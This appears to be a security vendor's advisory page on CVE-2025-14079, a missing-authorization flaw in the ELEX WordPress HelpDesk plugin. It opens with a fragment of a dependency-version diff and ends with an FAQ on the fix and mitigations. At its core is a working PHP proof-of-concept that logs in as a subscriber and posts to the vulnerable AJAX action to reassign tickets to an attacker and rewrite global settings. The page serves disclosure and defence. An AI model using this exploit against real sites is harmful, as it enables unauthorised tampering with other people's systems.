             'dev_requirement' => false,
         ),
         'guzzlehttp/psr7' => array(
-            'pretty_version' => '2.8.0',
-            'version' => '2.8.0.0',
-            'reference' => '21dc724a0583619cd1652f673303492272778051',
+            'pretty_version' => '2.6.0',
+            'version' => '2.6.0.0',
+            'reference' => '8bd7c33a0734ae1c5d074360512beb716bef3f77',
             'type' => 'library',
             'install_path' => __DIR__ . '/../guzzlehttp/psr7',
             'aliases' => array(),
@@ -110,29 +101,14 @@
             'dev_requirement' => false,
         ),
         'nesbot/carbon' => array(
-            'pretty_version' => '2.73.0',
-            'version' => '2.73.0.0',
-            'reference' => '9228ce90e1035ff2f0db84b40ec2e023ed802075',
+            'pretty_version' => '2.68.1',
+            'version' => '2.68.1.0',
+            'reference' => '4f991ed2a403c85efbc4f23eb4030063fdbe01da',
             'type' => 'library',
             'install_path' => __DIR__ . '/../nesbot/carbon',
             'aliases' => array(),
             'dev_requirement' => false,
         ),
-        'psr/clock' => array(
-            'pretty_version' => '1.0.0',
-            'version' => '1.0.0.0',
-            'reference' => 'e41a24703d4560fd0acb709162f73b8adfc3aa0d',
-            'type' => 'library',
-            'install_path' => __DIR__ . '/../psr/clock',
-            'aliases' => array(),
-            'dev_requirement' => false,
-        ),
-        'psr/clock-implementation' => array(
-            'dev_requirement' => false,
-            'provided' => array(
-                0 => '1.0',
-            ),
-        ),
         'psr/container' => array(
             'pretty_version' => '1.1.2',
             'version' => '1.1.2.0',
@@ -143,9 +119,9 @@
             'dev_requirement' => false,
         ),
         'psr/http-client' => array(
-            'pretty_version' => '1.0.3',
-            'version' => '1.0.3.0',
-            'reference' => 'bb5906edc1c324c9a05aa0873d40117941e5fa90',
+            'pretty_version' => '1.0.2',
+            'version' => '1.0.2.0',
+            'reference' => '0955afe48220520692d2d09f7ab7e0f93ffd6a31',
             'type' => 'library',
             'install_path' => __DIR__ . '/../psr/http-client',
             'aliases' => array(),
@@ -158,9 +134,9 @@
             ),
         ),
         'psr/http-factory' => array(
-            'pretty_version' => '1.1.0',
-            'version' => '1.1.0.0',
-            'reference' => '2b4765fddfe3b508ac62f829e852b1501d3f6e8a',
+            'pretty_version' => '1.0.2',
+            'version' => '1.0.2.0',
+            'reference' => 'e616d01114759c4c489f93b099585439f795fe35',
             'type' => 'library',
             'install_path' => __DIR__ . '/../psr/http-factory',
             'aliases' => array(),
@@ -206,9 +182,9 @@
             'dev_requirement' => false,
         ),
         'symfony/deprecation-contracts' => array(
-            'pretty_version' => 'v2.5.4',
-            'version' => '2.5.4.0',
-            'reference' => '605389f2a7e5625f273b53960dc46aeaf9c62918',
+            'pretty_version' => 'v2.5.2',
+            'version' => '2.5.2.0',
+            'reference' => 'e8b495ea28c1d97b5e0c121748d6f9b53d075c66',
             'type' => 'library',

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14079 - ELEX WordPress HelpDesk & Customer Ticketing System <= 3.3.5 - Missing Authorization to Authenticated (Subscriber+) Settings Update

<?php
/**
 * Proof of Concept for CVE-2025-14079
 * Requires: WordPress installation with ELEX HelpDesk plugin <= 3.3.5
 *           Valid subscriber-level credentials
 *           Valid nonce from wsdesk_nonce (available to subscribers)
 */

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Initialize cURL session for WordPress login
$ch = curl_init();

// Step 1: Login to WordPress and obtain authentication cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);

// Step 2: Extract nonce from WSDesk interface (available to subscribers)
// The nonce is typically available in page source or via AJAX
$admin_url = $target_url . '/wp-admin/admin.php?page=wsdesk_settings';
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, 0);
$response = curl_exec($ch);

// Extract nonce from response (simplified - actual implementation would parse HTML)
// In real exploitation, the nonce would be obtained from page source or JavaScript
$nonce = 'EXTRACTED_NONCE_VALUE'; // Replace with actual nonce extraction

// Step 3: Exploit missing authorization in eh_crm_ticket_general function
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_data = array(
    'action' => 'eh_crm_ticket_general',
    'nonce' => $nonce,
    'default_assignee' => 'attacker_user_id',  // Change default assignee to attacker
    'default_label' => 'critical',            // Modify default ticket label
    'ticket_raiser' => 'registered_user',     // Change ticket raiser setting
    'ticket_raiser_roles' => 'subscriber'     // Modify allowed roles
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));

$response = curl_exec($ch);

// Check response
if (strpos($response, 'success') !== false || strpos($response, 'updated') !== false) {
    echo "[+] Vulnerability exploited successfullyn";
    echo "[+] Global WSDesk settings modified by subscriber usern";
    echo "[+] Response: " . $response . "n";
} else {
    echo "[-] Exploit failedn";
    echo "[-] Response: " . $response . "n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-14079?
Overview of the vulnerability
CVE-2025-14079 is a medium-severity vulnerability in the ELEX WordPress HelpDesk & Customer Ticketing System plugin, affecting versions up to and including 3.3.5. It arises from missing authorization checks, allowing authenticated users with Subscriber-level access or higher to modify global plugin settings.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to exploit the `eh_crm_ticket_general` AJAX action, which lacks proper capability checks. By sending a POST request with a valid nonce, attackers can change critical settings such as default ticket assignees and labels.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the ELEX HelpDesk & Customer Ticketing System plugin version 3.3.5 or lower is affected. Administrators should check their plugin version in the WordPress dashboard under ‘Plugins’.
How can I check if my site is vulnerable?
Steps for verification
To verify if your site is vulnerable, check the version of the ELEX HelpDesk plugin installed. If it is 3.3.5 or lower, your site is at risk and should be updated immediately.
What is the recommended fix for this vulnerability?
Updating the plugin
The recommended fix is to update the ELEX HelpDesk & Customer Ticketing System plugin to version 3.3.6 or later, where the missing authorization checks have been implemented to mitigate the issue.
What does a CVSS score of 5.3 indicate?
Understanding the severity rating
A CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized changes in plugin settings, potentially affecting site operations.
What practical risks does this vulnerability pose?
Potential impacts on site functionality
Exploitation of this vulnerability could allow unauthorized users to alter important settings, disrupting ticket management and business logic. This could lead to misrouted tickets, degraded service quality, and potential data integrity issues.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept provided illustrates how an authenticated user can exploit the vulnerability by sending a crafted POST request to the vulnerable AJAX action. This demonstrates the ease with which an attacker can modify settings without proper authorization.
What steps can I take to mitigate this vulnerability if I cannot update immediately?
Temporary measures
If immediate updating is not possible, consider disabling the ELEX HelpDesk plugin until a patch can be applied. Additionally, review user roles and permissions to limit access to authenticated users.
Are there any other security practices I should follow?
General WordPress security recommendations
In addition to keeping plugins updated, regularly review user roles and permissions, implement strong passwords, and consider using security plugins to monitor for unauthorized changes and vulnerabilities.
What should I do if I suspect my site has been compromised?
Response to potential exploitation
If you suspect exploitation, immediately change passwords for all user accounts, review site activity logs for unauthorized changes, and consult with a security professional to assess and remediate any damage.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2025-14079 can be found on the official CVE database, as well as security blogs and forums that cover WordPress vulnerabilities and best practices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations